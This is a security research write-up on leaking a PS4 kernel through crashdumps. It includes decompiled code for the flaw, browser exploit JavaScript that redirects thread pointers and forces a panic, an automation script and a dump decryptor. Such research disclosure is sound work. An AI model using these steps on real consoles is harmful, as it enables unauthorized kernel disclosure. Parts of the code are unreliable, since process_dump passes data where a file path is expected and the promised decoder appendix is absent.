Dumping a PS4 Kernel in "Only" 6 Days

By ps4_enthusiast

Filed under ps4 vulnerability exploit

What if a secure device had an attacker-viewable crashdump format?

What if that same device allowed putting arbitrary memory into the crashdump?

Amazingly, the ps4 tempted fate by supporting both of these features!

Let’s see how that turned out…

Crashdumps on PS4

The crash-handling infrastructure of the ps4 kernel is interesting for two main reasons:

1. It is ps4-specific code (and therefore likely to be buggy).
2. If the crashdump can be decoded, we will gain very useful info for finding bugs and creating reliable exploits.

On a normal FreeBSD system, a kernel panic will create a dump by calling kern_reboot with the RB_DUMP flag. This then leads to doadump being called, which will dump a rather tiny amount of information about the kernel image itself to some storage device.

On ps4, the replacement for doadump is mdbg_run_dump, which can be called from panic or directly from trap_fatal. By comparison, the amount of information stored in the dump is gigantic: kernel state for all process, thread, and vm objects is included, along with some metadata about loaded libraries. Other obvious departures from the vanilla FreeBSD method are that mdbg_run_dump encodes the recorded data on a field-by-field basis, and then encrypts the resulting buffer before finally storing it to disk.

Dumping Anything

Let’s zoom in on a special part of mdbg_run_dump: the loop where it iterates over every process’ threads and tries to dump some pthread state:

```c
void mdbg_run_dump(struct trapframe *frame)
{
    // ...
    for (p = allproc; p != NULL; p = cur_proc->p_list.le_next) {
        // ...
        for (td = p->p_threads.tqh_first; td != NULL; td = td->td_plist.tqe_next) {
            // ...
            mdbg_pthread_fill_thrinfo2(&dumpstate, td->td_proc,
                (void *)td->td_pcb->pcb_fsbase, sysdump__internal_call_readuser);
            // ...
        }
        // ...
    }
    // ...
}

void mdbg_pthread_fill_thrinfo2(void *dst, struct proc *p, void *fsbase,
    int (*callback)(void *dst, struct proc *p, signed __int64 va, int len))
{
    struct pthread *tcb_thread; // [rsp+8h] [rbp-408h]
    u8 pthread[984];            // [rsp+10h] [rbp-400h]

    if (!callback(&tcb_thread, p, (signed __int64)fsbase + 0x10, 8) &&
        !callback(pthread, p, (signed __int64)tcb_thread, 984)) {
        *(_QWORD *)dst = *(_QWORD *)&pthread[0xA8];
        *((_QWORD *)dst + 1) = *(_QWORD *)&pthread[0xB0];
    }
}

int sysdump__internal_call_readuser(void *dst, struct proc *p, signed __int64 va, int len)
{
    const void *src;    // rsi
    struct vmspace *vm; // rcx
    int rv;             // rax
    vm_paddr_t kva;     // rax

    src = (const void *)va;
    if (va >= 0) {
        // if va is in userspace, get a kernel mapping of the address
        // (note "va" is treated as signed, here)
        vm = p->p_vmspace;
        rv = EFAULT;
        if (!vm)
            return rv;
        kva = pmap_extract(vm->vm_pmap, va);
        src = (const void *)(kva | -(signed __int64)(kva < 1) | 0xFFFFFE0000000000LL);
    }
    rv = EFAULT;
    if (src && src != (const void *)-1LL) {
        if (va < 0) {
            src = (const void *)va;
        } else {
            rv = ESRCH;
            if (!p)
                return rv;
        }
        // so, this can still be reached even if "va" is originally in kernel space!
        memcpy(dst, src, len);
        rv = 0LL;
    }
    return rv;
}
```

Above, dumpstate is a temporary buffer which will eventually make it into the crashdump. In short, sysdump__internal_call_readuser can be made to function as a read-anywhere oracle. This is because fsbase points into our (owned) webkit process’ usermode address space, so even without changing the actual fsbase value, we may freely change the value of tcb_thread, which is stored at fsbase + 0x10. The second callback then copies 984 bytes from wherever tcb_thread points, and the two QWORDs at offsets 0xA8 and 0xB0 of that copy are written into the dump.

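Further, a kernel address is negative when treated as a signed 64-bit value, so sysdump__internal_call_readuser skips the pmap_extract translation and will happily memcpy from that kernel address straight into the dump.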
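To make the oracle concrete, here is a small Python model of the two callbacks above. It is a sketch under stated assumptions, not a reimplementation: kernel memory is stood in for by a flat byte image at a chosen base, and the helper names (as_signed64, tcb_thread_for, simulate_fill_thrinfo2, readuser_copies_directly) are hypothetical. It shows the one piece of arithmetic that matters: to leak the 0x10 bytes at some target address, tcb_thread must be set to target - 0xA8.

```python
MASK64 = (1 << 64) - 1
PTHREAD_COPY_LEN = 984  # bytes copied from tcb_thread by mdbg_pthread_fill_thrinfo2
LEAK_OFFSET = 0xA8      # pthread[0xA8] and pthread[0xB0] are what reach the dump
LEAK_LEN = 0x10


def as_signed64(value):
    """Reinterpret a 64-bit value as signed, like the decompiled `signed __int64 va`."""
    value &= MASK64
    return value - (1 << 64) if value >> 63 else value


def readuser_copies_directly(va):
    """True when sysdump__internal_call_readuser skips pmap_extract and memcpy()s
    straight from va: any address with bit 63 set, except -1, which the
    `src != -1` check rejects."""
    return as_signed64(va) < 0 and (va & MASK64) != MASK64


def tcb_thread_for(target):
    """Value to store at fsbase + 0x10 so the leaked 0x10 bytes start at target."""
    return (target - LEAK_OFFSET) & MASK64


def simulate_fill_thrinfo2(image, image_base, tcb_thread):
    """Hypothetical model of the second callback against a flat memory image
    mapped at image_base: copy 984 bytes from tcb_thread, keep 0x10 at +0xA8."""
    off = tcb_thread - image_base
    if off < 0 or off + PTHREAD_COPY_LEN > len(image):
        raise ValueError("read falls outside the model image")
    pthread = image[off:off + PTHREAD_COPY_LEN]
    return pthread[LEAK_OFFSET:LEAK_OFFSET + LEAK_LEN]


# usage: a 4 KiB stand-in for kernel memory at the pre-ASLR .text base
base = 0xFFFFFFFF80000000
image = bytes(range(256)) * 16
target = base + 0x200
assert readuser_copies_directly(target)
assert not readuser_copies_directly(0x200000)  # user address: goes through pmap_extract
assert simulate_fill_thrinfo2(image, base, tcb_thread_for(target)) == image[0x200:0x210]
```

The same "minus 0xA8" adjustment shows up in the exploit JS later in the post, where dump_base is shifted before being written into each thread’s tcb_thread slot.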

We can now put any kernel location into the dump, but we still need to decrypt and decode it…

Aside from that, there’s also the issue that we may only add 0x10 bytes per thread in this manner…

Crashdump Crypto

The crazy news about crashdump encryption isn’t just that it is symmetric; the same keys also tend to be reused across firmware versions! This meant that from firmware 1.01 until they somehow realized it was “probably a bad idea” to reuse symmetric keys that could be exposed if the kernel were dumped, only versioned_keys[1] was needed (see Appendix). After that point crashdumps are still useful; however, you must dump the kernel once beforehand in order to obtain the keys.
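For the pre-4.50 scheme, the Decryptor in the Appendix derives the per-dump keys from just two inputs: the root key kc and the openpsid_enc blob stored in the dump’s secure header. The sketch below restates that derivation and the data_hmac check with Python’s standard hmac/hashlib modules instead of pycryptodome. The 0x80-byte hashed header span and the 0x4000-byte data offset are taken from the Appendix code; the function names are hypothetical, and the byte strings in the usage lines are dummies, not real keys.

```python
import hashlib
import hmac

DUMP_BLOCK_LEN = 0x4000          # encrypted data starts here (Decryptor.DUMP_BLOCK_LEN)
SECURE_HEADER_HASHED_LEN = 0x80  # secure_header bytes covered by data_hmac


def derive_keyset(kc, openpsid_enc):
    """(hmac_key, aes_key) = the two halves of HMAC-SHA256(kc, openpsid_enc)."""
    digest = hmac.new(kc, openpsid_enc, hashlib.sha256).digest()
    return digest[:0x10], digest[0x10:]


def compute_data_hmac(hmac_key, image, data_len):
    """Mirror of Decryptor.hmac_verify: MAC the hashed secure_header span plus
    image[DUMP_BLOCK_LEN:data_len] (data_len includes the header block)."""
    mac = hmac.new(hmac_key, digestmod=hashlib.sha256)
    mac.update(image[:SECURE_HEADER_HASHED_LEN])
    mac.update(image[DUMP_BLOCK_LEN:data_len])
    return mac.digest()


def find_keyset(candidate_kcs, openpsid_enc, image, data_len, data_hmac):
    """Try each candidate root key the way unwrap_keyset does; None if none verify."""
    for kc in candidate_kcs:
        hmac_key, aes_key = derive_keyset(kc, openpsid_enc)
        if hmac.compare_digest(compute_data_hmac(hmac_key, image, data_len), data_hmac):
            return hmac_key, aes_key
    return None


# usage with dummy values (not real keys): build a fake image and tag, then search
kc = b"\x11" * 16
openpsid_enc = b"\x22" * 16
image = bytes(DUMP_BLOCK_LEN) + b"\xaa" * 0x100
data_len = len(image)
hmac_key, aes_key = derive_keyset(kc, openpsid_enc)
tag = compute_data_hmac(hmac_key, image, data_len)
assert find_keyset([b"\x00" * 16, kc], openpsid_enc, image, data_len, tag) == (hmac_key, aes_key)
```

Note that kd never appears in the key derivation: in the Appendix code it is only used to recover the OpenPSID itself, which unwrap_keyset prints. The resulting aes_key is then used for AES-CBC with an all-zero IV.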

Crashdump Decoding

The crashdump encoding (which we know is called “nxdp” from the symbols present in firmware 1.01) is a simple derivative of run-length encoding, supporting a few primitive data types. A functional parser is at the end of the post (see Appendix).

Crashdump Automation

This seems like quite a bit of effort for some 0x10 bytes per thread, doesn’t it? Wait, it gets better! During testing, I found that I could only make ~600 threads exist concurrently before the browser process would crash, hang, or simply refuse to create more threads. Some simple math:

```
full_dump_size             = 32MB
crashdump_cycle_time       = ~5 minutes
thread_per_crashdump_cycle = 600
per_dump_size              = thread_per_crashdump_cycle * 0x10 bytes = 9600 bytes

(full_dump_size / per_dump_size) * crashdump_cycle_time = 11 days
```
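The same estimate can be reproduced in a few lines of Python. This sketch assumes every cycle leaks exactly 600 × 0x10 bytes and rounds up to whole crash cycles; the function name days_to_dump is hypothetical. Depending on whether "32MB" is read as 32,000,000 bytes or as 32 MiB, the total lands between roughly 11.6 and 12.1 days, so "11 days" is a ballpark figure.

```python
import math

THREADS_PER_CYCLE = 600
BYTES_PER_THREAD = 0x10
CYCLE_MINUTES = 5


def days_to_dump(total_bytes):
    per_cycle = THREADS_PER_CYCLE * BYTES_PER_THREAD  # 9600 bytes per crash
    cycles = math.ceil(total_bytes / per_cycle)       # a partial cycle still costs a full crash
    return cycles * CYCLE_MINUTES / (60 * 24)


print(round(days_to_dump(32_000_000), 1))  # 11.6 (decimal megabytes)
print(round(days_to_dump(32 * 2**20), 1))  # 12.1 (32 MiB)
```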

11 days… Eventually, I was able to cut the required time down to only 6 days by being a bit more selective about which memory ranges to dump. Normally, when dumping via a software exploit, one would just dump as much as possible linearly, which has the advantage of also pulling in .bss and other areas that can be handy for static analysis.
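Choosing ranges instead of dumping linearly means the per-run base address has to walk a list of regions rather than simply increment. A minimal sketch of that bookkeeping follows, assuming the regions are given as hypothetical [start, end) pairs (the post does not say which ranges were chosen) and that each crash cycle covers one contiguous 600 × 0x10-byte window; plan_cycles is an illustrative name, not part of the original tooling.

```python
CHUNK = 600 * 0x10  # bytes leaked per crash cycle (one 0x10 slot per thread)


def plan_cycles(ranges):
    """Return one base address per crash cycle so that every [start, end)
    range is covered; the list index plays the role of the dump index."""
    bases = []
    for start, end in ranges:
        addr = start
        while addr < end:
            bases.append(addr)
            addr += CHUNK
    return bases


# hypothetical example: two small regions of interest
example = [(0xFFFFFFFF80000000, 0xFFFFFFFF80000000 + 2 * CHUNK),
           (0xFFFFFFFF80100000, 0xFFFFFFFF80100001)]
assert plan_cycles(example) == [0xFFFFFFFF80000000,
                                0xFFFFFFFF80000000 + CHUNK,
                                0xFFFFFFFF80100000]
```

With a plan like this, the exploit would look up bases[index] instead of computing base + 600 * 0x10 * index, which is the linear scheme the browser-side JS in this post uses.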

With the prerequisites for leaking the kernel out of crashdumps taken care of, I set about automating the procedure so that I could just let it run without thinking about it and come back some days later to a shiny new kernel dump.

Since the ps4 kernel stores the crashdump on the hard drive, I needed a way to either intercept the data in flight to the hard drive, or rig up some way to read from the hard drive between panic cycles. Conveniently, it was around this time that I heard about the work vpikhur had done on EAP. Details of the EAP hack are out of scope for this post (see his talk for more details), but suffice it to say that EAP is an embedded processor in the Aeolia southbridge, and vpikhur had figured out how to get persistent kernel-level code exec on it (:D). Using knowledge gained from this hack, I was provided with a replacement EAP kernel binary that would detect crashdumps on the hard drive and shoot them over the network to my PC.

With this capability, plus some small hardware modifications to connect my ps4’s power switch to the network and to simulate input to the ps4 with Linux’ USB gadget API, I was able to script the entire process. The following code ran on my PC and spoke to a web server on a Novena (remote_server) to control the ps4:

```python
import requests, time
import socket
import parse_dump
import struct
from io import BytesIO
import traceback

remote_server = 'novena ip'

def send_cmd(cmd):
    # the web server on the Novena performs the action named in this header
    requests.get('http://%s' % (remote_server), headers={'remote-cmd': cmd})

def dump_index_get():
    try:
        with open('dump-index') as f:
            return int(f.read())
    except FileNotFoundError:
        # first run: start dumping from index 0
        return 0

def dump_index_set(index):
    print('setting dump-index to %i' % (index))
    with open('dump-index', 'w') as f:
        f.write('%i' % (index))

def dump_index_increment():
    index = dump_index_get()
    dump_index_set(index + 1)

def process_dump(partition_data):
    nxdp = parse_dump.NXDP(BytesIO(parse_dump.Decryptor(partition_data).data))
    # uses the most recent thread_info sent to the http server to transpose
    # the dump data into flat memory dumps
    nxdp.dump_thread_leak()

def recv_exact(conn, n):
    # recv() may return fewer bytes than requested; loop until we have n
    buf = b''
    while len(buf) < n:
        chunk = conn.recv(min(n - len(buf), 0x8000))
        if not chunk:
            raise ConnectionError('connection closed before all data arrived')
        buf += chunk
    return buf

def recv_dump():
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        sock.bind(('', 1339))
        sock.listen(1)
        conn, addr = sock.accept()
        with conn:
            magic = struct.unpack('<L', recv_exact(conn, 4))[0]
            if magic != 0x13371337:
                print('bad magic')
            length, status = struct.unpack('<2L', recv_exact(conn, 4 * 2))
            if status != 0:
                print('bad status')
            data = recv_exact(conn, length)
            process_dump(data)

# make sure dump-index exists
dump_index_set(dump_index_get())
# turn on
send_cmd('power')
while True:
    # boot from healthy state takes ~30 seconds
    time.sleep(35)
    # going to browser should load exploit and crash ps4
    send_cmd('start-browser')
    # wait for exploit to run and ps4 to power off completely
    time.sleep(20)
    # power on ps4
    # it will go through fsck (~60secs) and boot to a "send error report?" screen.
    send_cmd('power')
    # power must be pressed twice...
    time.sleep(2)
    send_cmd('power')
    time.sleep(60)  # fsck
    time.sleep(35)  # power-up
    # go past "send error report?" screen...
    send_cmd('ack-crash')
    # wait for xmb to load
    time.sleep(10)
    # go to rest mode to let EAP do its thing
    send_cmd('suspend')
    # wait for data to arrive and process it
    try:
        recv_dump()
        # after recving all data from EAP, need to wait for reboot (done on loop)
        # assuming EAP sent data OK, it will reboot by itself into healthy state
        dump_index_increment()
    except Exception:
        # expect that nxdp data was recv'd, but decode fail -> just retry same
        # position
        traceback.print_exc()
        print('nxdp decode failed, retry')
```

Triggering the Vulnerability

In order to progressively dump the regions I wanted, I created a simple JSON schema to record metadata that ties each TID to the kernel address its portion of the crashdump will contain, and that also tracks the base address used per run (getDumpIndex(), here). Below is the snippet of JS executed in the ps4 browser process in order to initiate a crashdump:

```javascript
...
// spawn threads which will just spin, and modify tcb->tcb_thread
// inf loop around nanosleep(30 secs)
var thread_map = [];
for (var thrcnt = 0; thrcnt < 600; thrcnt++) {
    var local_buf = scratchPtr.plus(0x2000);
    var rv = doCall(gadgets.pthread_create, local_buf, 0, syms.libkernel.inf_loop_with_nanosleep, 0);
    var thread = read64(local_buf);
    var tcb = read64(thread.plus(0x1e0));
    var tid = read32(thread);
    thread_map.push({ tcb_thread_ptr: tcb.plus(0x10), thr_idx: thrcnt, tid: tid });
}
// this was for back when there was no kernel .text aslr :)
var dump_base = new U64(0x80000000, 0xffffffff);
dump_base = dump_base.plus(600 * 0x10 * getDumpIndex());
// sync layout so dumped memory can be ordered correctly
sendThreadInfo(dump_base, thread_map);
// wait for threads to start - delayed start could overwrite tcb_thread
doCall(gadgets.sleep, 3);
// now set tcb_thread
dump_base = dump_base.minus(0xa8);
for (var i = 0; i < thread_map.length; i++) {
    // 0x10 bytes at each tcb_thread + 0xa8 will be added to dump
    var t = thread_map[i];
    var dumpaddr = dump_base.plus(t.thr_idx * 0x10);
    write64(t.tcb_thread_ptr, dumpaddr);
}
// panic (here, using namedobj bug to free invalid pointer)
kernel_free(toU64(0xdeadbeef));
return;
}
```

After each panic and crashdump, the ps4 would reboot and go through its standard fsck procedure. My control script would then put the ps4 into suspend mode, at which point the custom EAP kernel would take over and upload the crashdump to my PC. Once on the PC, the crashdump would be decrypted and parsed in order to extract the 9600 leaked bytes. Then the process would start all over…for 6 days :)
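On the PC side, turning the decoded dump back into flat memory only needs the metadata that sendThreadInfo uploaded. The sketch below assumes a hypothetical JSON record of the form {"dump_base": ..., "threads": [{"tid": ..., "thr_idx": ...}]} (the post does not give the actual schema) and assumes the nxdp decoder yields a mapping from TID to the 0x10 bytes recovered for that thread. Slot i of the resulting window corresponds to dump_base + i * 0x10, matching the write64 loop in the JS above. reassemble is an illustrative name; the author’s real logic lives in parse_dump’s dump_thread_leak, which is not shown here.

```python
import json

SLOT = 0x10  # bytes leaked per thread


def reassemble(thread_info_json, leaks_by_tid):
    """Rebuild the leaked window from a (hypothetical) thread-info record.

    Returns (dump_base, window), where window[i*0x10:(i+1)*0x10] holds the bytes
    leaked by the thread whose thr_idx is i. Threads missing from the dump leave
    their slot zero-filled.
    """
    info = json.loads(thread_info_json)
    threads = info["threads"]
    window = bytearray(len(threads) * SLOT)
    for t in threads:
        data = leaks_by_tid.get(t["tid"])
        if data is None:
            continue
        if len(data) != SLOT:
            raise ValueError("expected 0x10 bytes for tid %d" % t["tid"])
        off = t["thr_idx"] * SLOT
        window[off:off + SLOT] = data
    return info["dump_base"], bytes(window)


record = json.dumps({"dump_base": 0xFFFFFFFF80000000,
                     "threads": [{"tid": 101, "thr_idx": 0},
                                 {"tid": 102, "thr_idx": 1},
                                 {"tid": 103, "thr_idx": 2}]})
base, window = reassemble(record, {101: b"A" * 16, 103: b"C" * 16})
assert base == 0xFFFFFFFF80000000
assert window == b"A" * 16 + bytes(16) + b"C" * 16
```

Zero-filling missing slots keeps offsets stable, but it also makes a missing thread indistinguishable from memory that really is zero; a more careful tool might record which slots were filled and retry the rest.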

The Fix (Kind of…)

On firmware ~4.50, the crashdump key generation method was finally changed so that decrypting the dump contents requires knowledge of an asymmetric (RSA private) key.

```c
// one of the first calls mdbg_run_dump makes
int sysdump_output_establish_secure_context_on_dump()
{
    int rv;                 // eax
    u8 nonces_to_sign[32];  // [rsp+8h] [rbp-48h]

    // fill globals
    sysdump_rng_nonce3_128(nonce3);
    sysdump_rng_nonce4_128(nonce4);
    memcpy(nonces_to_sign, nonce3, 16LL);
    memcpy(&nonces_to_sign[16], nonce4, 16LL);
    rv = RsaesOaepEnc2048_Sha256(sysdump_rsa_n, sysdump_rsa_e, nonces_to_sign, 32,
                                 sysdump_rsa_enc_nonces);
    if (rv)
        bzero(sysdump_rsa_enc_nonces, 0x100uLL);
    Sha256HmacInit(sysdump_hmac_ctx, nonce4, 0x10u);
    bzero(dump_aes_ctx_iv, 0x10uLL);
    return rv;
}
```

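The above version of sysdump_output_establish_secure_context_on_dump is from firmware 4.55. nonce3 is the value which will be used as the crashdump AES key (and nonce4 keys the HMAC). Both are generated fresh by the RNG when the dump starts and are only stored in the dump within an RSA-encrypted blob, and the kernel holds only the public modulus and exponent, so dumping the kernel no longer yields the keys. As such, a new approach would be needed to attempt key recovery.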

Fin

This was probably the most convoluted and lengthy setup I’ve done for a bug which amounts to just an infoleak. But it was a fun experience.

Keep Hacking!

Appendix

Crashdump Decryptor

```python
'''
This decrypts a coredump stored on the "custom" swap partition.
The GPT UUID is B4 A5 A9 76 B0 44 2A 47 BD E3 31 07 47 2A DE E2
Look for "Decryptor.header_t" (see below)...
'''
# needs pycryptodome and a construct 2.5-era release (old Struct('name', ...) API)
from Crypto.Cipher import AES
from Crypto.Hash import HMAC, SHA256
import binascii, struct
from construct import *

def aes_ecb_encrypt(k, d):
    return AES.new(k, AES.MODE_ECB).encrypt(d)

def aes_ecb_decrypt(k, d):
    return AES.new(k, AES.MODE_ECB).decrypt(d)

def hmac_sha256(k, d):
    return HMAC.new(k, msg=d, digestmod=SHA256).digest()

def ZeroPadding(size):
    return Padding(size, strict=True)

class RootKeys:
    def __init__(s, kd, kc):
        s.kd = binascii.unhexlify(kd)
        s.kc = binascii.unhexlify(kc)

class Keyset:
    def __init__(s, hmac_key, aes_key):
        s.hmac_key, s.aes_key = hmac_key, aes_key
        s.iv = b'\0' * len(s.aes_key)

class Decryptor:
    DUMP_BLOCK_LEN = 0x4000
    # real keys withheld: replace these placeholders with hex strings,
    # otherwise unhexlify() fails as soon as the class is defined
    versioned_keys = {
        1: [RootKeys('you', 'should')],
        2: [RootKeys('probably', 'find')],
        3: [
            RootKeys('these', 'your-'),  # 4.05
            RootKeys('self', ':)'),      # 4.07
        ],
    }
    secure_header_t = Struct('secure_header',
        # only seen version 1 so far
        ULInt32('version'),
        # Aes128Ecb(kd, openpsid)
        Bytes('openpsid_enc', 0x10),
        # 0x80 bytes of secure_header are hashed for the data_hmac,
        # but only 0x14 bytes (actual used bytes) are actually written to disk...
        ZeroPadding(0x80 - 0x14),
    )
    final_header_t = Struct('final_header',
        Bytes('unknown', 0x10),
        # 1 : unread dump present, 2 : no new dump data
        ULInt64('state'),
        ULInt64('data_len'),
        ZeroPadding(0x10),
        Bytes('data_hmac', 0x20)
    )
    header_t = Struct('header',
        secure_header_t,
        ZeroPadding(0x100 - secure_header_t.sizeof()),
        final_header_t
    )

    def keygen(s, openpsid, root_keys):
        openpsid_enc = aes_ecb_encrypt(root_keys.kd, openpsid)
        digest = hmac_sha256(root_keys.kc, openpsid_enc)
        return Keyset(digest[:0x10], digest[0x10:])

    def hmac_verify(s, keyset):
        hmac = HMAC.new(keyset.hmac_key, digestmod=SHA256)
        with open(s.fpath, 'rb') as f:
            hmac.update(f.read(s.secure_header_t.sizeof()))
            data_len = s.header.final_header.data_len
            data_len -= s.DUMP_BLOCK_LEN
            f.seek(s.DUMP_BLOCK_LEN)
            hmac.update(f.read(data_len))
        return hmac.digest() == s.header.final_header.data_hmac

    def unwrap_keyset(s):
        openpsid_enc = s.header.secure_header.openpsid_enc
        version = s.header.secure_header.version
        for root_keys in s.versioned_keys[version]:
            openpsid = aes_ecb_decrypt(root_keys.kd, openpsid_enc)
            digest = hmac_sha256(root_keys.kc, openpsid_enc)
            keyset = Keyset(digest[:0x10], digest[0x10:])
            if s.hmac_verify(keyset):
                print('OpenPSID: %s' % (binascii.hexlify(openpsid)))
                return keyset
        return None

    def __init__(s, fpath, default_openpsid=None, default_keyset_id=None):
        s.fpath = fpath
        with open(s.fpath, 'rb') as f:
            s.header = s.header_t.parse_stream(f)
        if s.header.final_header.state == 1:
            s.keyset = s.unwrap_keyset()
        else:
            # something happened to the dump (like it was "consumed" after a reboot).
            # in that case most of the header will be zeroed
            assert default_openpsid is not None, 'must provide openpsid to decrypt dump without secure_header'
            assert default_keyset_id is not None, 'must provide keyset id to decrypt dump without secure_header'
            root_keys = s.versioned_keys[default_keyset_id[0]][default_keyset_id[1]]
            s.keyset = s.keygen(default_openpsid, root_keys)
        assert s.keyset is not None
        # just decrypt it all at once for now
        # if we reach here, hmac is already verified or it didn't exist
        with open(s.fpath, 'rb') as f:
            f.seek(s.DUMP_BLOCK_LEN)
            data_enc = f.read()
        # This should actually be AesCbcCfb128Encrypt,
        # but it's always block-size multiple in crashdump usage.
        s.data = AES.new(s.keyset.aes_key, AES.MODE_CBC, s.keyset.iv).decrypt(data_enc)
        '''
        with open('debug.bin', 'wb') as fo:
            fo.write(s.data)
        #'''
```

NXDP Decoder